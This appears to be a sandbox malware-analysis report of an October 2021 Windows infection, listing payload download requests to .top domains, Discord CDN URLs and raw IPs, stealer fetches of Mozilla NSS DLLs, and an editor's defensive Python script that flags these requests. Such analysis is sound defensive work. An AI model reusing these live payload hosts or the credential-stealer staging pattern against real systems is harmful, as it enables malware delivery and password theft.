                Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK | Server: nginx | Date: Fri, 29 Oct 2021 12:10:52 GMT | Content-Type: application/octet-stream | Content-Length: 916735 | Connection: keep-alive | Last-Modified: Wed, 01 Sep 2021 16:21:39 GMT | ETag: "612fa893-dfcff" | Accept-Ranges: bytes
                Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK | Date: Fri, 29 Oct 2021 12:10:58 GMT | Server: Apache/2.4.6 (CentOS) PHP/5.6.40 | Last-Modified: Fri, 29 Oct 2021 12:10:02 GMT | ETag: "d6200-5cf7cb4ef9326" | Accept-Ranges: bytes | Content-Length: 877056 | Connection: close | Content-Type: application/octet-stream
                Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK | Server: nginx | Date: Fri, 29 Oct 2021 12:11:18 GMT | Content-Type: application/x-msdos-program | Content-Length: 334288 | Connection: keep-alive | Last-Modified: Wed, 14 Nov 2018 15:53:50 GMT | ETag: "519d0-57aa1f0b0df80" | Expires: Sat, 30 Oct 2021 12:11:18 GMT | Cache-Control: max-age=86400 | X-Cache-Status: EXPIRED | X-Cache-Status: HIT | Accept-Ranges: bytes
                Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK | Server: nginx | Date: Fri, 29 Oct 2021 12:11:18 GMT | Content-Type: application/x-msdos-program | Content-Length: 137168 | Connection: keep-alive | Last-Modified: Wed, 14 Nov 2018 15:53:50 GMT | ETag: "217d0-57aa1f0b0df80" | Expires: Sat, 30 Oct 2021 12:11:18 GMT | Cache-Control: max-age=86400 | X-Cache-Status: EXPIRED | X-Cache-Status: HIT | Accept-Ranges: bytes
                Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK | Server: nginx | Date: Fri, 29 Oct 2021 12:11:18 GMT | Content-Type: application/x-msdos-program | Content-Length: 440120 | Connection: keep-alive | Last-Modified: Wed, 14 Nov 2018 15:53:50 GMT | ETag: "6b738-57aa1f0b0df80" | Expires: Sat, 30 Oct 2021 12:11:18 GMT | Cache-Control: max-age=86400 | X-Cache-Status: EXPIRED | X-Cache-Status: HIT | Accept-Ranges: bytes
                Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK | Server: nginx | Date: Fri, 29 Oct 2021 12:11:19 GMT | Content-Type: application/x-msdos-program | Content-Length: 1246160 | Connection: keep-alive | Last-Modified: Wed, 14 Nov 2018 15:53:50 GMT | ETag: "1303d0-57aa1f0b0df80" | Expires: Sat, 30 Oct 2021 12:11:19 GMT | Cache-Control: max-age=86400 | X-Cache-Status: EXPIRED | X-Cache-Status: HIT | Accept-Ranges: bytes
                Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK | Server: nginx | Date: Fri, 29 Oct 2021 12:11:19 GMT | Content-Type: application/x-msdos-program | Content-Length: 144848 | Connection: keep-alive | Last-Modified: Wed, 14 Nov 2018 15:53:50 GMT | ETag: "235d0-57aa1f0b0df80" | Expires: Sat, 30 Oct 2021 12:11:19 GMT | Cache-Control: max-age=86400 | X-Cache-Status: EXPIRED | X-Cache-Status: HIT | Accept-Ranges: bytes
                Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK | Server: nginx | Date: Fri, 29 Oct 2021 12:11:19 GMT | Content-Type: application/x-msdos-program | Content-Length: 83784 | Connection: keep-alive | Last-Modified: Wed, 14 Nov 2018 15:53:50 GMT | ETag: "14748-57aa1f0b0df80" | Expires: Sat, 30 Oct 2021 12:11:19 GMT | Cache-Control: max-age=86400 | X-Cache-Status: EXPIRED | X-Cache-Status: HIT | Accept-Ranges: bytes
                Source: unknown | HTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.3:49826 version: TLS 1.0
                Source: global traffic | TCP traffic: 192.168.2.3:49978 -> 93.115.20.139:28978
                Source: global traffic | TCP traffic: 192.168.2.3:50095 -> 213.142.148.231:58682
                Source: global traffic | TCP traffic: 192.168.2.3:50109 -> 185.215.113.94:15564
                Source: global traffic | TCP traffic: 192.168.2.3:50115 -> 2.56.214.190:59628
                Source: D8D0.exe.10.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                Source: CD17.exe.10.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
                Source: D8D0.exe.10.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
                Source: CD17.exe.10.dr | String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
                Source: CD17.exe.10.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
                Source: D8D0.exe.10.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
                Source: CD17.exe.10.dr | String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
                Source: D8D0.exe.10.dr | String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
                Source: D8D0.exe.10.dr | String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                Source: CD17.exe.10.dr | String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
                Source: D8D0.exe.10.dr | String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
                Source: CD17.exe.10.dr | String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
                Source: B096.exe, B096.exe.10.dr | String found in binary or memory: http://fontello.com
                Source: D8D0.exe.10.dr | String found in binary or memory: http://ocsp.digicert.com0C
                Source: CD17.exe.10.dr | String found in binary or memory: http://ocsp.digicert.com0N
                Source: D8D0.exe.10.dr | String found in binary or memory: http://ocsp.digicert.com0O
                Source: CD17.exe.10.dr | String found in binary or memory: http://ocsp.sectigo.com0
                Source: B096.exe, 00000018.00000002.502019916.0000000002DA1000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: DF3A.exe.10.dr | String found in binary or memory: http://tempuri.org/DetailsDataSet1.xsd
                Source: D8D0.exe.10.dr | String found in binary or memory: http://www.digicert.com/CPS0
                Source: sqlite3.dll.35.dr | String found in binary or memory: http://www.sqlite.org/copyright.html.
                Source: C066.exe, 00000023.00000003.537936940.000000004DBE1000.00000004.00000010.sdmp, RYwTiizs2t.35.dr | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: f13931a8-f7f2-4c5b-8012-fa5bd2fcc868.tmp.36.dr, f4c1d6ea-25cd-46c1-a120-5b8b54342841.tmp.36.dr | String found in binary or memory: https://accounts.google.com
                Source: craw_window.js.34.dr | String found in binary or memory: https://accounts.google.com/MergeSession
                Source: B096.exe, 00000018.00000002.503371064.0000000003E09000.00000004.00000001.sdmp, aspnet_state.exe, 0000001E.00000000.439226875.0000000000402000.00000040.00000001.sdmp, DF3A.exe, 00000027.00000000.489693993.0000000000402000.00000040.00000001.sdmp, ServiceModelReg.exe, 00000028.00000000.483819247.0000000000402000.00000040.00000001.sdmp | String found in binary or memory: https://api.ip.sb/ip
                Source: f13931a8-f7f2-4c5b-8012-fa5bd2fcc868.tmp.36.dr, f4c1d6ea-25cd-46c1-a120-5b8b54342841.tmp.36.dr | String found in binary or memory: https://apis.google.com
                Source: B096.exe, 00000018.00000002.502019916.0000000002DA1000.00000004.00000001.sdmp | String found in binary or memory: https://cdn.discordapp.com
                Source: B096.exe | String found in binary or memory: https://cdn.discordapp.com/attachments/8
                Source: DF3A.exe.10.dr | String found in binary or memory: https://cdn.discordapp.com/attachments/893177342426509335/902526114763767818/A623D0D3.jpg
                Source: DF3A.exe.10.dr | String found in binary or memory: https://cdn.discordapp.com/attachments/893177342426509335/902526117016109056/AB0F9338.jpg
                Source: D8D0.exe.10.dr | String found in binary or memory: https://cdn.discordapp.com/attachments/893177342426509335/903196811345395712/6058E8D5.jpg
                Source: BBE1.exe, 0000001B.00000000.422812164.0000000000792000.00000002.00020000.sdmp, BBE1.exe.10.dr | String found in binary or memory: https://cdn.discordapp.com/attachments/893177342426509335/903333369742491648/1E88D378.jpg
                Source: B096.exe, 00000018.00000002.502019916.0000000002DA1000.00000004.00000001.sdmp, B096.exe.10.dr | String found in binary or memory: https://cdn.discordapp.com/attachments/893177342426509335/903575517888925756/6D9E3C88.jpg
                Source: B096.exe, 00000018.00000002.502019916.0000000002DA1000.00000004.00000001.sdmp, B096.exe.10.dr | String found in binary or memory: https://cdn.discordapp.com/attachments/893177342426509335/903575519373697084/F83CB811.jpg
                Source: FD36.exe.10.dr | String found in binary or memory: https://cdn.discordapp.com/attachments/893177342426509335/903579324031074365/ECF88C37.jpg
                Source: DEDC.exe.10.dr | String found in binary or memory: https://cdn.discordapp.com/attachments/893177342426509335/903580013041967104/06ED9A1B.jpg
                Source: DEDC.exe.10.dr | String found in binary or memory: https://cdn.discordapp.com/attachments/893177342426509335/903580015046828032/039F9A54.jpg
                Source: DEDC.exe.10.drString found in binary or memory: https://cdn.discordapp.com/attachments/893177342426509335/903580017093660692/A303D181.jpg
                Source: DEDC.exe.10.drString found in binary or memory: https://cdn.discordapp.com/attachments/893177342426509335/903580019203387432/930B55FC.jpg
                Source: C066.exe, 00000023.00000003.537936940.000000004DBE1000.00000004.00000010.sdmp, RYwTiizs2t.35.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: f13931a8-f7f2-4c5b-8012-fa5bd2fcc868.tmp.36.dr, f4c1d6ea-25cd-46c1-a120-5b8b54342841.tmp.36.drString found in binary or memory: https://clients2.google.com
                Source: manifest.json.34.drString found in binary or memory: https://clients2.google.com/service/update2/crx
                Source: f13931a8-f7f2-4c5b-8012-fa5bd2fcc868.tmp.36.dr, f4c1d6ea-25cd-46c1-a120-5b8b54342841.tmp.36.drString found in binary or memory: https://clients2.googleusercontent.com
                Source: f13931a8-f7f2-4c5b-8012-fa5bd2fcc868.tmp.36.drString found in binary or memory: https://content-autofill.googleapis.com
                Source: Reporting and NEL.36.drString found in binary or memory: https://csp.withgoogle.com/csp/report-to/IdentityListAccountsHttp/external
                Source: f3f072f8-9740-417a-a88b-dfe93adcb8b1.tmp.36.dr, f13931a8-f7f2-4c5b-8012-fa5bd2fcc868.tmp.36.dr, f4c1d6ea-25cd-46c1-a120-5b8b54342841.tmp.36.drString found in binary or memory: https://dns.google
                Source: C066.exe, 00000023.00000003.537936940.000000004DBE1000.00000004.00000010.sdmp, RYwTiizs2t.35.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: C066.exe, 00000023.00000003.537936940.000000004DBE1000.00000004.00000010.sdmp, RYwTiizs2t.35.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: C066.exe, 00000023.00000003.537936940.000000004DBE1000.00000004.00000010.sdmp, RYwTiizs2t.35.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: f4c1d6ea-25cd-46c1-a120-5b8b54342841.tmp.36.drString found in binary or memory: https://fonts.googleapis.com
                Source: f13931a8-f7f2-4c5b-8012-fa5bd2fcc868.tmp.36.dr, f4c1d6ea-25cd-46c1-a120-5b8b54342841.tmp.36.drString found in binary or memory: https://fonts.gstatic.com
                Source: craw_window.js.34.dr, craw_background.js.34.drString found in binary or memory: https://github.com/google/closure-library/wiki/goog.module:-an-ES6-module-like-alternative-to-goog.p
                Source: Network Action Predictor.34.drString found in binary or memory: https://js.monitor.azure.com/
                Source: Reporting and NEL.36.drString found in binary or memory: https://mdec.nelreports.net/api/report?cat=mdocs
                Source: f13931a8-f7f2-4c5b-8012-fa5bd2fcc868.tmp.36.dr, f4c1d6ea-25cd-46c1-a120-5b8b54342841.tmp.36.drString found in binary or memory: https://ogs.google.com
                Source: craw_window.js.34.dr, manifest.json.34.drString found in binary or memory: https://payments.google.com/payments/v4/js/integrator.js
                Source: f13931a8-f7f2-4c5b-8012-fa5bd2fcc868.tmp.36.dr, f4c1d6ea-25cd-46c1-a120-5b8b54342841.tmp.36.drString found in binary or memory: https://play.google.com
                Source: f13931a8-f7f2-4c5b-8012-fa5bd2fcc868.tmp.36.drString found in binary or memory: https://r4---sn-4g5e6nss.gvt1.com
                Source: f13931a8-f7f2-4c5b-8012-fa5bd2fcc868.tmp.36.drString found in binary or memory: https://redirector.gvt1.com
                Source: craw_window.js.34.dr, manifest.json.34.drString found in binary or memory: https://sandbox.google.com/payments/v4/js/integrator.js
                Source: C066.exe, 00000023.00000003.537936940.000000004DBE1000.00000004.00000010.sdmp, RYwTiizs2t.35.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
                Source: C066.exe, 00000023.00000003.537936940.000000004DBE1000.00000004.00000010.sdmp, RYwTiizs2t.35.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: CD17.exe.10.drString found in binary or memory: https://sectigo.com/CPS0D
                Source: f13931a8-f7f2-4c5b-8012-fa5bd2fcc868.tmp.36.dr, f4c1d6ea-25cd-46c1-a120-5b8b54342841.tmp.36.drString found in binary or memory: https://ssl.gstatic.com
                Source: craw_window.js.34.dr, craw_background.js.34.drString found in binary or memory: https://www-googleapis-staging.sandbox.google.com
                Source: D8D0.exe.10.drString found in binary or memory: https://www.digicert.com/CPS0
                Source: f13931a8-f7f2-4c5b-8012-fa5bd2fcc868.tmp.36.dr, f4c1d6ea-25cd-46c1-a120-5b8b54342841.tmp.36.drString found in binary or memory: https://www.google.com
                Source: manifest.json.34.drString found in binary or memory: https://www.google.com/
                Source: craw_window.js.34.drString found in binary or memory: https://www.google.com/accounts/OAuthLogin?issueuberauth=1
                Source: C066.exe, 00000023.00000003.537936940.000000004DBE1000.00000004.00000010.sdmp, RYwTiizs2t.35.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: craw_window.js.34.drString found in binary or memory: https://www.google.com/images/cleardot.gif
                Source: craw_window.js.34.drString found in binary or memory: https://www.google.com/images/dot2.gif
                Source: craw_window.js.34.drString found in binary or memory: https://www.google.com/images/x2.gif
                Source: craw_background.js.34.drString found in binary or memory: https://www.google.com/intl/en-US/chrome/blank.html
                Source: f13931a8-f7f2-4c5b-8012-fa5bd2fcc868.tmp.36.dr, craw_window.js.34.dr, f4c1d6ea-25cd-46c1-a120-5b8b54342841.tmp.36.dr, craw_background.js.34.drString found in binary or memory: https://www.googleapis.com
                Source: manifest.json.34.drString found in binary or memory: https://www.googleapis.com/
                Source: manifest.json.34.drString found in binary or memory: https://www.googleapis.com/auth/chromewebstore
                Source: manifest.json.34.drString found in binary or memory: https://www.googleapis.com/auth/chromewebstore.readonly
                Source: manifest.json.34.drString found in binary or memory: https://www.googleapis.com/auth/sierra
                Source: manifest.json.34.drString found in binary or memory: https://www.googleapis.com/auth/sierrasandbox
                Source: f13931a8-f7f2-4c5b-8012-fa5bd2fcc868.tmp.36.dr, f4c1d6ea-25cd-46c1-a120-5b8b54342841.tmp.36.drString found in binary or memory: https://www.gstatic.com
Source: unknown | DNS traffic detected: queries for: xacokuo8.top
Source: global traffic | HTTP traffic detected:
    GET /downloads/toolspab2.exe HTTP/1.1
    Connection: Keep-Alive
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Host: privacytoolzforyou-6000.top
Source: global traffic | HTTP traffic detected:
    GET /game.exe HTTP/1.1
    Connection: Keep-Alive
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Host: sysaheu90.top
Source: global traffic | HTTP traffic detected:
    GET /agrybirdsgamerept HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Content-Type: text/plain; charset=UTF-8
    Host: toptelete.top
Source: global traffic | HTTP traffic detected:
    GET //l/f/SZ0UyXwB3dP17Spzhll9/cb2d375dd6e8a66a5a24666f2ccf0d937c972efe HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: 194.180.174.181
Source: global traffic | HTTP traffic detected:
    GET /dl/buildz.exe HTTP/1.1
    Connection: Keep-Alive
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Host: znpst.top
Source: global traffic | HTTP traffic detected:
    GET //l/f/SZ0UyXwB3dP17Spzhll9/44498d94a24300ea08dae81ac5b8f477f8279a65 HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: 194.180.174.181
Source: global traffic | HTTP traffic detected:
    GET /freebl3.dll HTTP/1.1
    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
    Host: 65.108.80.190
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    GET /mozglue.dll HTTP/1.1
    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
    Host: 65.108.80.190
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    GET /msvcp140.dll HTTP/1.1
    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
    Host: 65.108.80.190
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    GET /nss3.dll HTTP/1.1
    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
    Host: 65.108.80.190
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    GET /softokn3.dll HTTP/1.1
    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
    Host: 65.108.80.190
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    GET /vcruntime140.dll HTTP/1.1
    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
    Host: 65.108.80.190
    Connection: Keep-Alive
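The request list above shows three patterns worth keying on: bare .exe downloads presented with an Internet Explorer 11 user-agent string, requests to hard-coded IP hosts that carry no User-Agent at all, and a burst of six DLL fetches from 65.108.80.190 that includes the Mozilla NSS libraries (nss3.dll, softokn3.dll, freebl3.dll, mozglue.dll), which credential stealers pull at run time so they can decrypt Firefox password stores on the victim. The Python below is an added example by the editor, not Joe Sandbox code and not a signature from this report: it re-parses the requests above (transcribed here as constructed input, headers in the order listed) and tags each one with those three heuristics. The tag names, the three-DLL threshold and the helper names are the editor's assumptions.

```python
"""Heuristic tagging of the HTTP requests listed in this report (editor's example)."""
import ipaddress
from collections import defaultdict

# Mozilla NSS/NSPR libraries: stealers fetch them at run time to decrypt
# Firefox credential stores (logins.json / key4.db) on the victim machine.
NSS_DLLS = {"nss3.dll", "softokn3.dll", "freebl3.dll", "mozglue.dll"}
# Internet Explorer 11 user-agent string, as seen on the report's .exe fetches.
IE11_UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko"

# Header block shared by the six DLL fetches in the report (constructed from it).
NSS_FETCH_HDRS = (
    "Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, "
    "image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\n"
    "Accept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\n"
    "Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\n"
    "Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\n"
    "Host: 65.108.80.190\r\nConnection: Keep-Alive\r\n\r\n"
)

def _exe(path, host):  # shape of the report's .exe fetches
    return f"GET {path} HTTP/1.1\r\nConnection: Keep-Alive\r\nUser-Agent: {IE11_UA}\r\nHost: {host}\r\n\r\n"

def _noua(path, host, extra=""):  # shape of the report's no-User-Agent requests
    return (f"GET {path} HTTP/1.1\r\nCache-Control: no-cache\r\nConnection: Keep-Alive\r\n"
            f"Pragma: no-cache\r\n{extra}Host: {host}\r\n\r\n")

REQUESTS = [  # constructed input: the twelve requests listed in the report
    _exe("/downloads/toolspab2.exe", "privacytoolzforyou-6000.top"),
    _exe("/game.exe", "sysaheu90.top"),
    _noua("/agrybirdsgamerept", "toptelete.top", "Content-Type: text/plain; charset=UTF-8\r\n"),
    _noua("//l/f/SZ0UyXwB3dP17Spzhll9/cb2d375dd6e8a66a5a24666f2ccf0d937c972efe", "194.180.174.181"),
    _exe("/dl/buildz.exe", "znpst.top"),
    _noua("//l/f/SZ0UyXwB3dP17Spzhll9/44498d94a24300ea08dae81ac5b8f477f8279a65", "194.180.174.181"),
] + [
    f"GET /{dll} HTTP/1.1\r\n{NSS_FETCH_HDRS}"
    for dll in ("freebl3.dll", "mozglue.dll", "msvcp140.dll", "nss3.dll", "softokn3.dll", "vcruntime140.dll")
]

def parse_request(raw):
    """Split a raw HTTP/1.1 request into (method, path, headers); header names lower-cased."""
    head, _, _body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers

def _is_ip(host):
    """True for a literal IPv4/IPv6 Host value (optional :port stripped for IPv4)."""
    try:
        ipaddress.ip_address(host.split(":")[0])
        return True
    except ValueError:
        return False

def classify(raw):
    """Return (host, path, tags) for one request; the tags are the editor's heuristic labels."""
    _method, path, hdrs = parse_request(raw)
    host, ua = hdrs.get("host", ""), hdrs.get("user-agent", "")
    tags = []
    if path.lower().endswith(".exe") and "Trident/7.0" in ua:
        tags.append("exe-download-ie11-ua")   # next-stage binary pulled with an IE11 UA
    if _is_ip(host) and not ua:
        tags.append("raw-ip-no-ua")           # hard-coded IP, no browser-like User-Agent
    if path.lstrip("/").lower() in NSS_DLLS:
        tags.append("nss-dll-fetch")          # Firefox credential decryption dependency
    return host, path, tags

def summarize(raws):
    """Group (host, path) pairs by tag across all requests."""
    out = defaultdict(list)
    for raw in raws:
        host, path, tags = classify(raw)
        for tag in tags:
            out[tag].append((host, path))
    return dict(out)

def nss_staging_hosts(raws, min_dlls=3):
    """Hosts that served at least min_dlls distinct NSS libraries: stealer dependency staging."""
    per_host = defaultdict(set)
    for host, path in summarize(raws).get("nss-dll-fetch", []):
        per_host[host].add(path.lstrip("/").lower())
    return {h: sorted(d) for h, d in per_host.items() if len(d) >= min_dlls}

if __name__ == "__main__":
    for tag, hits in summarize(REQUESTS).items():
        print(tag, hits)
    print("NSS staging hosts:", nss_staging_hosts(REQUESTS))
```

Run against the report's requests, the three .exe fetches, the eight no-User-Agent requests to raw IPs and the four NSS library fetches each land in their own bucket, and 65.108.80.190 is the only host that clears the staging threshold. The threshold matters: a single nss3.dll fetch can be a legitimate software update, four NSS components from one raw IP with a Russian Accept-Language header is not.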
Source: unknown | Network traffic detected: HTTP traffic on port 443 (224 per-connection entries; each pairs the HTTPS server port 443 with one sandbox-side ephemeral port, given here per direction with the ports sorted)
    443 -> sandbox port (111 entries): 49678, 49680, 49698, 49726, 49727, 49728, 49729, 49731, 49732, 49733, 49734, 49735, 49736, 49737, 49738, 49739, 49740, 49741, 49742, 49743, 49807, 49809, 49811, 49816, 49826, 49830, 49835, 49836, 49858, 49862, 49863, 49864, 49865, 49872, 49873, 49874, 49875, 49876, 49892, 49893, 49894, 49897, 49898, 49899, 49900, 49904, 49905, 49906, 49907, 49908, 49909, 49910, 49911, 49913, 49915, 49916, 49919, 49920, 49922, 49924, 49925, 49926, 49933, 49934, 49937, 49938, 49940, 49941, 49990, 50003, 50008, 50009, 50010, 50011, 50017, 50020, 50021, 50022, 50023, 50034, 50036, 50038, 50039, 50043, 50044, 50045, 50046, 50049, 50050, 50053, 50054, 50058, 50059, 50060, 50066, 50067, 50070, 50071, 50072, 50104, 50105, 50111, 50112, 50113, 50114, 50123, 50127, 50129, 50130, 50139, 50141
    sandbox port -> 443 (113 entries): 49678, 49693, 49694, 49698, 49701, 49726, 49727, 49728, 49729, 49731, 49732, 49733, 49734, 49735, 49736, 49737, 49738, 49739, 49740, 49741, 49742, 49743, 49807, 49809, 49811, 49816, 49826, 49830, 49835, 49836, 49858, 49862, 49863, 49864, 49865, 49872, 49873, 49874, 49875, 49876, 49892, 49893, 49894, 49897, 49898, 49899, 49900, 49904, 49905, 49906, 49907, 49908, 49909, 49910, 49911, 49913, 49915, 49916, 49919, 49920, 49922, 49924, 49925, 49926, 49933, 49934, 49937, 49938, 49940, 49941, 49990, 50003, 50008, 50009, 50010, 50011, 50017, 50020, 50021, 50022, 50023, 50034, 50036, 50038, 50039, 50043, 50044, 50045, 50046, 50049, 50050, 50053, 50054, 50058, 50059, 50060, 50066, 50067, 50070, 50071, 50072, 50104, 50105, 50111, 50112, 50113, 50114, 50123, 50127, 50129, 50130, 50139, 50141
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 12:09:40 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 0d 0a 14 00 00 00 7b fa f1 1a b5 69 2b 2c 47 fa 0e a8 c1 82 9f 4f 1a c4 da 16 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 19{i+,GO0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 12:09:40 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d1 95 4f 11 6a 11 e9 b2 83 bd a6 0b a2 13 cc 7b b8 43 12 c2 55 a1 b9 67 f4 25 45 51 b8 f6 cb 41 e1 0e 88 16 95 e1 63 da 7d b3 ef d2 01 79 e4 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OOj{CUg%EQAc}yc0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 12:09:43 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
